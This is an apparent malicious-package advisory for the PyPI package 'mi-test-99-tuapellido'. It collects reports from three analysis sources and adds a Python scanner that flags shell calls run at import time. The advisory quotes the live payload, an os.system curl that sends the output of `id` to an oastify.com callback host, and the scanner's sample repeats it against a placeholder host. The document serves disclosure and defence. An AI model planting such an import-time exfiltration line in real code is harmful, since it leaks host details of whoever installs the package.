MAL-2026-6478
Malicious code in mi-test-99-tuapellido (PyPI)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (4b71b66c156e0a54b73b6dd2f2f9e994ac9c1ff9ab4d1f9689f1f930b3097f39)

On every import, the package's top-level `__init__.py` runs `os.system("curl http://6krddfbeqw0pisps3egdsofu9lfc33vrk.oastify.com -d $(id)")`. This unconditionally executes a shell pipeline that POSTs the output of the `id` command (current uid/gid/group membership) to a Burp Suite Collaborator (oastify.com) subdomain — an out-of-band callback service used to confirm remote code execution and exfiltrate data. The behavior fires on `import mi_test_99` with no user gating, no relation to any advertised functionality, over plaintext HTTP. Package metadata is placeholder-shaped (name contains the literal Spanish placeholder `tuapellido`/'your-surname', author fields are `Tu Nombre <tu@email.com>`, pyproject comment reads `CAMBIA ESTO por un nombre único`), consistent with a dependency-confusion or namespace-squat proof-of-concept payload. Whether intended as a test or a live attack, any installer that imports this package leaks host identity to an attacker-controlled collector and demonstrates an arbitrary-shell-exec channel.

## Source: kam193 (060712d1fb233a9a9be7115401704cd0ab7cb4f3e15dc1f58ad5ef4685d5fe37)

Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose.
---
Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities.
Campaign: GENERIC-standard-pypi-install-pentest
Reasons (based on the campaign):
- The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.
- The package overrides the install command in setup.py to execute malicious code during installation.
## Source: ossf-package-analysis (2d2263c69d2201d6f365635468e2e0b55f4bd4140098f9268223b8f6729af033)

The OpenSSF Package Analysis project identified 'mi-test-99-tuapellido' @ 99.9 (pypi) as malicious.
It is considered malicious because:
- The package communicates with a domain associated with malicious activity.
- The package executes one or more commands associated with malicious behavior.
Affected packages
No fixed version published yet for mi-test-99-tuapellido (pip). Pin to a known-safe version or switch to an alternative.
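The import-time `os.system` call described in the source details can be flagged statically before a package is ever imported. The following is an added example, not code from this advisory or any of its sources; the function names, the list of flagged callables, and the sample `__init__.py` (with a placeholder host) are assumptions made for illustration.

```python
import ast

# Standard-library callables that hand a command line or argv to the OS.
SHELL_CALLS = {"os.system", "os.popen", "subprocess.run", "subprocess.call",
               "subprocess.Popen", "subprocess.check_call", "subprocess.check_output"}

def _import_time_nodes(tree):
    """Yield nodes outside function/lambda definitions, i.e. code that runs on import."""
    stack = [tree]
    while stack:
        node = stack.pop()
        yield node
        for child in ast.iter_child_nodes(node):
            if not isinstance(child, (ast.FunctionDef, ast.AsyncFunctionDef, ast.Lambda)):
                stack.append(child)

def find_import_time_exec(source):
    """Return sorted (lineno, dotted_name) for shell/process calls executed at import."""
    tree = ast.parse(source)
    alias = {}  # local name -> fully qualified name, built from import statements
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                alias[a.asname or a.name] = a.name
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                alias[a.asname or a.name] = f"{node.module}.{a.name}"
    hits = []
    for node in _import_time_nodes(tree):
        if not isinstance(node, ast.Call):
            continue
        f = node.func
        if isinstance(f, ast.Attribute) and isinstance(f.value, ast.Name):
            name = f"{alias.get(f.value.id, f.value.id)}.{f.attr}"  # e.g. o.system -> os.system
        elif isinstance(f, ast.Name):
            name = alias.get(f.id, f.id)  # e.g. bare system() imported from os
        else:
            continue
        if name in SHELL_CALLS:
            hits.append((node.lineno, name))
    return sorted(hits)

# Constructed sample shaped like the behaviour described above (placeholder host).
SAMPLE_INIT = '''import os
os.system("curl http://collector.example.invalid -d $(id)")
def helper():
    os.system("true")  # inside a function body: does not run on import
'''
```

Run it over the `__init__.py` and `setup.py` of an unpacked sdist or wheel rather than an installed package, since installing or importing is what triggers the payload.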